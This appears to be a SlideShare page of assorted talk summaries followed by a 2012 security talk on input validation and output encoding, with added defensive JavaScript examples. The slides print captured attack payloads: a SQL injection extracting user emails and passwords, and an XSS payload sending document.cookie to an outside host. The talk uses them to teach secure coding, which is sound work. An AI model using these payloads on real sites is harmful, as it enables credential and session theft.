This talk should help you gain useful insights from a histogram, or at the very least point you in the right direction for further analysis.
Abusing JavaScript to Measure Web Performance by Philip Tellis
While building boomerang, we developed many interesting methods to measure network performance characteristics using JavaScript running in the browser. While the W3C's NavigationTiming API provides access to many performance metrics, there's far more you can get at with some creative tweaking and analysis of how the browser reacts to certain requests.
In this talk, I'll go into the details of how boomerang works to measure network throughput, latency, TCP connect time, DNS time and IPv6 connectivity. I'll also touch upon some of the other performance related browser APIs we use to gather useful information. I will NOT be covering the W3C Navigation Timing API since that's been covered by Alois Reitbauer in a previous Boston Web Perf talk.
The document discusses analyzing real user monitoring (RUM) data to gain insights into website performance and user behavior. It describes building plugins to collect navigation and timing data from browsers. Various statistical techniques for analyzing the data are covered, including log-normal distributions, filtering outliers, sampling, and correlating metrics like page load time and bounce rates. The analysis of an example 8 million page dataset suggests very fast or slow page loads are associated with higher bounce rates, and thresholds for user-unfriendly performance are proposed based on bounce rates exceeding 50%.
Analysing network characteristics with JavaScript by Philip Tellis
This document contains slides from a presentation about using JavaScript to analyze network performance. It discusses how to measure latency, TCP handshake time, network throughput, DNS lookup time, IPv6 support and latency, and private network scanning using JavaScript. Code examples are provided for measuring each of these network metrics by making image requests and timing the responses. The presentation emphasizes that accurately measuring network throughput requires requesting resources of different sizes and accounting for TCP slow start. It also notes some challenges around caching and geo-located DNS results.
A Node.JS bag of goodies for analyzing Web Traffic by Philip Tellis
This document is a presentation about analyzing web traffic using Node.js modules. It introduces Node.js and the npm package manager. It then discusses modules for parsing HTTP logs, including parsing user agents, handling IP addresses, geolocation, and date formatting. It also covers modules for statistical analysis like fast-stats, gauss, and statsd. The presentation provides code examples for using these modules and takes questions at the end.
Messing with JavaScript and the DOM to measure network characteristics by Philip Tellis
This document discusses using JavaScript to analyze network performance. It covers measuring latency, TCP handshake time, DNS lookup time, network throughput, and IPv6 support. The document provides code examples for measuring each of these metrics using JavaScript and analyzing image load times. It notes that network conditions vary and accurate measurements require statistical analysis over many samples.
Boomerang: How fast do users think your site is? by Philip Tellis
This document discusses how the Boomerang tool works to measure website performance from the end user's perspective. Boomerang is a piece of JavaScript code that measures network latency and throughput to the website, as well as page load time, and sends this performance data back to the website owners. It provides more accurate real-world performance metrics than lab testing by measuring performance across varying user devices, browsers, networks and other conditions that are outside the owners' control.
Comparison Table of DiskWarrior Alternatives.pdf by Andrey Yasko
To help you choose the best DiskWarrior alternative, we've compiled a comparison table summarizing the features, pros, cons, and pricing of six alternatives.
Fluttercon 2024: Showing that you care about security - OpenSSF Scorecards fo... by Chris Swan
Have you noticed the OpenSSF Scorecard badges on the official Dart and Flutter repos? It's Google's way of showing that they care about security. Practices such as pinning dependencies, branch protection, required reviews, continuous integration tests etc. are measured to provide a score and accompanying badge.
You can do the same for your projects, and this presentation will show you how, with an emphasis on the unique challenges that come up when working with Dart and Flutter.
The session will provide a walkthrough of the steps involved in securing a first repository, and then what it takes to repeat that process across an organization with multiple repos. It will also look at the ongoing maintenance involved once scorecards have been implemented, and how aspects of that maintenance can be better automated to minimize toil.
Transcript: Details of description part II: Describing images in practice - T... by BookNet Canada
This presentation explores the practical application of image description techniques. Familiar guidelines will be demonstrated in practice, and descriptions will be developed “live”! If you have learned a lot about the theory of image description techniques but want to feel more confident putting them into practice, this is the presentation for you. There will be useful, actionable information for everyone, whether you are working with authors, colleagues, alone, or leveraging AI as a collaborator.
Link to presentation recording and slides: https://bnctechforum.ca/sessions/details-of-description-part-ii-describing-images-in-practice/
Presented by BookNet Canada on June 25, 2024, with support from the Department of Canadian Heritage.
TrustArc Webinar - 2024 Data Privacy Trends: A Mid-Year Check-In by TrustArc
Six months into 2024, and it is clear the privacy ecosystem takes no days off!! Regulators continue to implement and enforce new regulations, businesses strive to meet requirements, and technology advances like AI have privacy professionals scratching their heads about managing risk.
What can we learn about the first six months of data privacy trends and events in 2024? How should this inform your privacy program management for the rest of the year?
Join TrustArc, Goodwin, and Snyk privacy experts as they discuss the changes we’ve seen in the first half of 2024 and gain insight into the concrete, actionable steps you can take to up-level your privacy program in the second half of the year.
This webinar will review:
- Key changes to privacy regulations in 2024
- Key themes in privacy and data governance in 2024
- How to maximize your privacy program in the second half of 2024
Understanding Insider Security Threats: Types, Examples, Effects, and Mitigat... by Bert Blevins
Today’s digitally connected world presents a wide range of security challenges for enterprises. Insider security threats are particularly noteworthy because they have the potential to cause significant harm. Unlike external threats, insider risks originate from within the company, making them more subtle and challenging to identify. This blog aims to provide a comprehensive understanding of insider security threats, including their types, examples, effects, and mitigation techniques.
Quantum Communications Q&A with Gemini LLM. These are based on Shannon's noisy-channel theorem and describe how the classical theory applies to the quantum world.
Paper introduction: A Systematic Survey of Prompt Engineering on Vision-Language Foundation ... by Toru Tamaki
Jindong Gu, Zhen Han, Shuo Chen, Ahmad Beirami, Bailan He, Gengyuan Zhang, Ruotong Liao, Yao Qin, Volker Tresp, Philip Torr "A Systematic Survey of Prompt Engineering on Vision-Language Foundation Models" arXiv2023
https://arxiv.org/abs/2307.12980
Scaling Connections in PostgreSQL - Postgres Bangalore (PGBLR) Meetup-2 - Mydbops by Mydbops
This presentation, delivered at the Postgres Bangalore (PGBLR) Meetup-2 on June 29th, 2024, dives deep into connection pooling for PostgreSQL databases. Aakash M, a PostgreSQL Tech Lead at Mydbops, explores the challenges of managing numerous connections and explains how connection pooling optimizes performance and resource utilization.
Key Takeaways:
* Understand why connection pooling is essential for high-traffic applications
* Explore various connection poolers available for PostgreSQL, including pgbouncer
* Learn the configuration options and functionalities of pgbouncer
* Discover best practices for monitoring and troubleshooting connection pooling setups
* Gain insights into real-world use cases and considerations for production environments
This presentation is ideal for:
* Database administrators (DBAs)
* Developers working with PostgreSQL
* DevOps engineers
* Anyone interested in optimizing PostgreSQL performance
Contact info@mydbops.com for PostgreSQL Managed, Consulting and Remote DBA Services
RPA In Healthcare Benefits, Use Case, Trend And Challenges 2024.pptx by SynapseIndia
Your comprehensive guide to RPA in healthcare for 2024. Explore the benefits, use cases, and emerging trends of robotic process automation. Understand the challenges and prepare for the future of healthcare automation.
Are you interested in dipping your toes in the cloud native observability waters, but as an engineer you are not sure where to get started with tracing problems through your microservices and application landscapes on Kubernetes? Then this is the session for you, where we take you on your first steps in an active open-source project that offers a buffet of languages, challenges, and opportunities for getting started with telemetry data.
The project is called OpenTelemetry, but before diving into the specifics, we'll start with de-mystifying key concepts and terms such as observability, telemetry, instrumentation, cardinality, and percentile to lay a foundation. After understanding the nuts and bolts of observability and distributed traces, we'll explore the OpenTelemetry community; its Special Interest Groups (SIGs), repositories, and how to become not only an end-user, but possibly a contributor. We will wrap up with an overview of the components in this project, such as the Collector, the OpenTelemetry protocol (OTLP), its APIs, and its SDKs.
Attendees will leave with an understanding of key observability concepts, become grounded in distributed tracing terminology, be aware of the components of OpenTelemetry, and know how to take their first steps to an open-source contribution!
Key Takeaways: Open source, vendor-neutral instrumentation is an exciting new reality as the industry standardizes on OpenTelemetry for observability. OpenTelemetry is on a mission to enable effective observability by making high-quality, portable telemetry ubiquitous. The world of observability and monitoring today has a steep learning curve, and in order to achieve ubiquity the project would benefit from growing its contributor community.
Best Practices for Effectively Running dbt in Airflow.pdf by Tatiana Al-Chueyr
As a popular open-source library for analytics engineering, dbt is often used in combination with Airflow. Orchestrating and executing dbt models as DAGs ensures an additional layer of control over tasks, observability, and provides a reliable, scalable environment to run dbt models.
This webinar will cover a step-by-step guide to Cosmos, an open source package from Astronomer that helps you easily run your dbt Core projects as Airflow DAGs and Task Groups, all with just a few lines of code. We’ll walk through:
- Standard ways of running dbt (and when to utilize other methods)
- How Cosmos can be used to run and visualize your dbt projects in Airflow
- Common challenges and how to address them, including performance, dependency conflicts, and more
- How running dbt projects in Airflow helps with cost optimization
Webinar given on 9 July 2024
How RPA Help in the Transportation and Logistics Industry.pptx by SynapseIndia
Revolutionize your transportation processes with our cutting-edge RPA software. Automate repetitive tasks, reduce costs, and enhance efficiency in the logistics sector with our advanced solutions.
Implementations of Fused Deposition Modeling in real world by Emerging Tech
The presentation showcases the diverse real-world applications of Fused Deposition Modeling (FDM) across multiple industries:
1. Is What You Get, What You Expect to Get?
Philip Tellis / philip@lognormal.com
ConFoo.ca / 2012-03-01
ConFoo.ca / 2012-03-01 Is What You Get, What You Expect to Get? 1
3. $ finger philip
Philip Tellis
philip@lognormal.com
@bluesmoon
geek - paranoid - speedfreak
co-founder Log-Normal
http://bluesmoon.info/
4. WARNING !
This presentation may contain unreadable code. Attempting to read it
is probably not worthwhile. Definitely not at 08:30. Screaming
WTF!!1! probably is.
5. How do you distinguish code from data?
6. < > ’ " & % ‘
7. Failure to tell the difference. . .
8. Note: This talk is NOT about XSS or SQLi,
but it might seem like it
9. Let’s look at a few examples
10. http://xxyyzz.com/forms/contact_form.asp?i=
0%27%20UNION%20ALL%20SELECT%201,2,3,4,5,%28
%27%3c%28%20%27%2buserId%29,%28firstname
%2b%27%20%27%2blastname%29,%28address%2b
%27%20city:%27%2bcity%29,9,10,11,12,13,14,15,16,
%28email%2b%27%20-Password:%20%27%27
%2buserpwd%2b%27%20%29%3e%27%29,18,19,20,21,
22,23,24,25,26,27,28,29,30%20FROM%20
11. http://xxyyzz.com/forms/contact_form.asp?i=
0' UNION ALL SELECT 1,2,3,4,5, (
' < ( ' + userId ) , ( firstname
+ ' ' + lastname ) , ( address +
' city: ' + city ) ,9,10,11,12,13,14,15,16,
( email + ' -Password: ' '
+ userpwd + ' ) > ' ) ,18,19,20,21,
22,23,24,25,26,27,28,29,30 FROM
12. Expected a positive integer, but got more than that
13. <?php
$id = htmlspecialchars($_GET['id']);
?>
...
value : <?php echo ($id) ? $id : 'null'; ?>
This is JavaScript code generated by PHP
17. Expected a positive integer, but got more than that
18. <a
<?php echo 'href=/stock_price?f=' .
htmlspecialchars($_GET['f']);
?>
>
20. use the quotes luke
<a "
<?php echo 'href=/stock_price?f=' .
htmlspecialchars($_GET['f']);
?>
>
24. The char codes translate to:
<img src=x onerror=(document.location='
http://standard33.freehostia.com/CS/lg.php?info='
+escape(document.cookie))>
$f was html encoded, but used unquoted as an attribute value.
Remember that spaces are never encoded.
25. Expected a stock symbol, but got more than that
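An added example, not code from the talk, that makes slide 24's point testable: a small start-tag attribute tokenizer in JavaScript, run over the talk's unquoted template, the "use the quotes" version, and a third version that also URL-encodes the value for the query-string context it sits in before the HTML encoding. The `/stock_price` path is from the slides; the sample value `x onerror=1` is constructed for the example.

```javascript
// Added example, not code from the talk: why an HTML-encoded value is still not
// safe as an UNQUOTED attribute value. The tokenizer below follows the HTML
// rule that an unquoted value ends at the first whitespace or '>', while a
// quoted value runs to the matching quote.

// Same mapping as PHP's htmlspecialchars() defaults: & < > " (not ', not space).
function htmlspecialchars(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;" };
  return s.replace(/[&<>"]/g, (c) => map[c]);
}

// Split the attributes of one start tag, e.g. '<a href=... onerror=...>', into
// [name, value] pairs in document order. Entities are deliberately not decoded:
// the split into attributes happens before any decoding.
function parseStartTagAttributes(tag) {
  const attrs = [];
  const tagName = /^<[A-Za-z][^\s\/>]*/.exec(tag);
  let i = tagName ? tagName[0].length : 0;
  const end = tag.lastIndexOf(">");
  const isSpace = (c) => /\s/.test(c);
  while (i < end) {
    while (i < end && isSpace(tag[i])) i++;
    if (i >= end) break;
    let name = "";
    while (i < end && !isSpace(tag[i]) && tag[i] !== "=") name += tag[i++];
    while (i < end && isSpace(tag[i])) i++;
    let value = "";
    if (tag[i] === "=") {
      i++;
      while (i < end && isSpace(tag[i])) i++;
      const q = tag[i];
      if (q === '"' || q === "'") {      // quoted: everything up to the matching quote
        i++;
        while (i < end && tag[i] !== q) value += tag[i++];
        i++;                             // step over the closing quote
      } else {                           // unquoted: stops at whitespace or '>'
        while (i < end && !isSpace(tag[i])) value += tag[i++];
      }
    }
    attrs.push([name.toLowerCase(), value]);
  }
  return attrs;
}

// The talk's template (encoded but unquoted), the "use the quotes" version, and
// a version that also URL-encodes the value for the query-string context it
// sits in, so a space becomes %20 before the HTML encoding is applied.
function unquotedLink(f) { return "<a href=/stock_price?f=" + htmlspecialchars(f) + ">"; }
function quotedLink(f)   { return '<a href="/stock_price?f=' + htmlspecialchars(f) + '">'; }
function urlThenHtmlLink(f) {
  return '<a href="/stock_price?f=' + htmlspecialchars(encodeURIComponent(f)) + '">';
}

// Constructed sample input: a symbol, a space, and a second "attribute".
const SAMPLE_F = "x onerror=1";
```

Run `parseStartTagAttributes(unquotedLink(SAMPLE_F))` and the tag carries two attributes, `href` and `onerror`, although nothing in the value was an HTML metacharacter; the quoted template keeps the whole value inside `href`, and the URL-encoded one never lets the space reach the HTML at all.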
26. <?php
$host=htmlspecialchars($_REQUEST['h'], ENT_QUOTES);
?>
...
var host = "<?php echo $host ?>";
var div = document.getElementById("l");
div.innerHTML = "<a href=\"http://xxx.xx.com/gethost?h=\"" + host + ">" + host + "</a>";
Notice the different contexts
What's special (meta) to one language but not the other?
33. h= " > < img src = " foo "
onerror = " alert( ' xss ' )
34. h="><img src="foo"
onerror="alert('xss')
35. Expected a hostname, but got something completely different
36. Dear IE6
<input value="[e0]"> "onmouseover=alert(0) >
That's 0xe0, start of 3 byte seq
38. Dear IE6
<input value=""onmouseover=alert(0) >
39. Expected valid UTF-8, got invalid UTF-8
40. So what’s the common theme here?
41. Should I be Validating Input or Encoding Output?
42. They solve two different problems, and you need both
43. Output Encoding (done automatically by your framework)
protects your users from XSS
44. Input Validation is a data quality issue
45. Is the input you get from a user of the type and range
that you expect it to be?
46. Sometimes it results in back end code injection
47. But it always results in bad data
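What "type and range that you expect" looks like in practice, as an added example that is not code from the talk: one validator per parameter seen in the earlier slides (`id`, `f`, `h`), each returning the normalized value or null. JavaScript is used because the talk's own examples end up in the browser; the stock-symbol format and the sample request are assumptions made for this example.

```javascript
// Added example, not code from the talk: check that each query parameter is the
// type and range the handler expects, before it reaches SQL, HTML or JavaScript.
// Every validator returns the normalized value, or null for "not what I expected".

// A record id: a positive integer and nothing else (no sign, no leading zero,
// no exponent, and certainly no quote or SQL keyword after it).
function expectPositiveInt(raw, max = Number.MAX_SAFE_INTEGER) {
  if (typeof raw !== "string" || !/^[1-9][0-9]{0,15}$/.test(raw)) return null;
  const n = Number(raw);
  return n <= max ? n : null;
}

// A stock symbol: 1-6 letters plus an optional two-letter exchange suffix
// (assumed format for this example; use your data source's real rules).
function expectStockSymbol(raw) {
  if (typeof raw !== "string") return null;
  const symbol = raw.trim().toUpperCase();
  return /^[A-Z]{1,6}(?:\.[A-Z]{1,2})?$/.test(symbol) ? symbol : null;
}

// A hostname: dot-separated labels of letters, digits and inner hyphens,
// at most 63 chars per label and 253 overall (RFC 1035 limits).
function expectHostname(raw) {
  if (typeof raw !== "string" || raw.length > 253) return null;
  const host = raw.toLowerCase().replace(/\.$/, "");
  const label = /^[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?$/;
  return host.split(".").every((l) => label.test(l)) ? host : null;
}

// Map each parameter name to the validator its handler expects (id from slide
// 13, f from slide 18, h from slide 26). Returns the clean values and the names
// that were rejected; the rejected list is worth logging, because bad data is
// the symptom even when it is not an injection attempt.
const VALIDATORS = { id: expectPositiveInt, f: expectStockSymbol, h: expectHostname };

function validateQuery(query) {
  const clean = {};
  const rejected = [];
  for (const [name, validator] of Object.entries(VALIDATORS)) {
    if (!(name in query)) continue;
    const value = validator(query[name]);
    if (value === null) rejected.push(name);
    else clean[name] = value;
  }
  return { clean, rejected };
}

// Constructed sample request: a SQL fragment where an id was expected, a
// lower-case symbol, and a hostname with a trailing dot.
const SAMPLE_QUERY = { id: "0' UNION ALL SELECT 1,2,3", f: "goog", h: "www.Example.com." };
```

`validateQuery(SAMPLE_QUERY)` keeps `f` and `h` (normalized) and rejects `id`; the handler then has nothing to encode that it did not ask for, while output encoding still protects the page if a valid-looking value is rendered.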
48. Bonus Example: This hit me in production yesterday
49. regex to check if text was a subdomain of a known domain
re=new RegExp('^(?:[^.]+.)*' + dom + '$', 'i');
re.exec(ref)
50. Sometimes IE8 will serve requests from a .mht file
mhtml:file://C:\Users\blah-blah-blah.mht
51. I expected the regex to reject this text
52. What I got was 100% CPU spent in regex backtracking
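The same check with the backtracking removed, as an added example that is not the author's code. The fix is the escaped dot in the repeated group (and escaping `dom` itself, which also contains dots), plus a length guard before the regex ever runs. `example.com` and the sample referrers are constructed for the example; the `mhtml:` one follows the form shown on slide 50.

```javascript
// Added example, not code from the talk: the subdomain check with the
// backtracking bug removed. In '^(?:[^.]+.)*' the second '.' is unescaped, so it
// matches ANY character and '[^.]+.' can carve a long input into exponentially
// many segmentations before the engine admits the domain is not at the end.
// With a literal '\.' each group has to end at a real dot and the match is linear.

// Escape every regex metacharacter in the known domain ("." included).
function escapeRegExp(s) {
  return s.replace(/[.*+?^${}()|[\]\\]/g, "\\$&");
}

// Build the matcher: zero or more "label." groups, then the domain, end of string.
function subdomainRegExp(dom) {
  return new RegExp("^(?:[^.]+\\.)*" + escapeRegExp(dom) + "$", "i");
}

// Run the check with two guards a referrer check should have anyway: a hard
// length limit before the regex sees the input, and false for anything that
// is not a string. Returns true only for dom itself or a subdomain of it.
function isSubdomainOf(ref, dom, maxLen = 253) {
  if (typeof ref !== "string" || ref.length > maxLen) return false;
  return subdomainRegExp(dom).test(ref);
}

// Same decision without a regex at all, for comparison: no backtracking to reason about.
function isSubdomainOfByString(ref, dom) {
  const h = String(ref).toLowerCase(), d = dom.toLowerCase();
  if (h === d) return true;
  if (!h.endsWith("." + d)) return false;
  const prefix = h.slice(0, h.length - d.length - 1);       // the "www" part
  return prefix.split(".").every((label) => label.length > 0);
}

// Constructed sample referrers, including the IE8 mhtml: form from the talk.
const SAMPLE_REFS = [
  "www.example.com",
  "example.com",
  "evil-example.com",
  "www.exampleXcom",
  "mhtml:file://C:\\Users\\blah-blah-blah.mht",
];
```

Note that with the unescaped dot the original pattern also accepted `www.exampleXcom` for `dom = "example.com"`, so the escape fixes a correctness bug as well as the CPU one; the string-based version is there to show that a referrer check does not need a regex at all.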
54. Unrelated Bonus Example: From a WordPress theme
55. <?php
$value=htmlspecialchars($_GET['value'], ENT_QUOTES);
?>
<input type="text"
value="<?php echo $value ?>"
onfocus="if(this.value=='<?php echo $value ?>')
{this.value = '';}" />
56. <input type="text"
value="'+alert(/xss/)+'"
onfocus="if(this.value==''+alert(/xss/)+'')
{this.value = '';}" />
Inside an on* handler, html entities are decoded before they
are passed on to JavaScript
58. <input type="text"
value="'+alert(/xss/)+'"
onfocus="if(this.value=='' +alert(/xss/)+ '')
{this.value = '';}" />
59. I have no idea what was expected here
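An added example, not code from the theme or the talk, that reproduces what slides 56-58 describe and shows the fix: it emulates the parser's entity decoding of the `onfocus` attribute, compares the handler JavaScript the browser would compile for the theme's template with a template that JS-escapes the value before HTML-escaping it, and applies the same innermost-context-first rule to the `<script>` string from slide 26. The `htmlDecodeAttribute`, `jsStringEncode` and `scriptStringLiteral` helpers and the sample values are constructed for this example.

```javascript
// Added example, not code from the theme or the talk: an on* handler's
// attribute value is entity-decoded by the HTML parser BEFORE the JavaScript
// engine compiles it, so the string literal inside needs JavaScript escaping
// first and HTML escaping second. The same "innermost context first" rule
// covers the gethost example (a JS string inside <script>).

// PHP htmlspecialchars($s, ENT_QUOTES) equivalent.
function htmlspecialcharsQuotes(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#039;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// What the parser does to an attribute value before the handler is compiled:
// decode named and numeric character references.
function htmlDecodeAttribute(s) {
  const named = { amp: "&", lt: "<", gt: ">", quot: '"', apos: "'" };
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);/gi, (m, body) => {
    if (body[0] === "#") {
      const hex = body[1].toLowerCase() === "x";
      return String.fromCodePoint(parseInt(body.slice(hex ? 2 : 1), hex ? 16 : 10));
    }
    return named[body.toLowerCase()] ?? m;
  });
}

// Encode for a JS string literal: anything outside a small safe set becomes a
// \xHH or \uHHHH escape, so no quote, backslash, slash or angle bracket survives.
function jsStringEncode(s) {
  return s.replace(/[^A-Za-z0-9 ,._-]/g, (c) => {
    const code = c.charCodeAt(0);
    return (code < 0x100 ? "\\x" : "\\u") + code.toString(16).padStart(code < 0x100 ? 2 : 4, "0");
  });
}

// The theme's handler (value encoded for HTML only) and the fixed one
// (encoded for JS, then for the attribute that carries it).
function themeOnfocus(value) {
  return "if(this.value=='" + htmlspecialcharsQuotes(value) + "'){this.value='';}";
}
function fixedOnfocus(value) {
  return "if(this.value=='" + htmlspecialcharsQuotes(jsStringEncode(value)) + "'){this.value='';}";
}

// The JS source the browser actually compiles for the handler.
function jsSeenByBrowser(attrValue) {
  return htmlDecodeAttribute(attrValue);
}

// Count the quote characters in the compiled source: the handler should have
// exactly four ('' around the value, '' in the reset); more means the literal
// was broken open.
function quoteCount(js) {
  return (js.match(/'/g) || []).length;
}

// For a JS string inside a <script> block (the gethost page): JSON-encode, then
// escape what matters to the HTML parser or ends a JS line.
function scriptStringLiteral(value) {
  return JSON.stringify(value).replace(/[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Constructed sample: the payload shape from slide 56.
const SAMPLE_VALUE = "'+alert(/xss/)+'";
```

`jsSeenByBrowser(themeOnfocus(SAMPLE_VALUE))` is exactly the handler on slide 58, with six quote characters where four were intended; `fixedOnfocus` yields a handler whose value is a single `\xHH`-escaped literal. The simpler fix for the theme is to keep data out of the handler altogether (read the placeholder from `this.defaultValue` or a `data-` attribute), and for the slide 26 page to build the link with `createElement`/`setAttribute`/`textContent` rather than `innerHTML`.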
61. Contact me
Philip Tellis
philip@lognormal.com
@bluesmoon
geek - paranoid - speedfreak
co-founder Log-Normal
http://bluesmoon.info/
slideshare.net/bluesmoon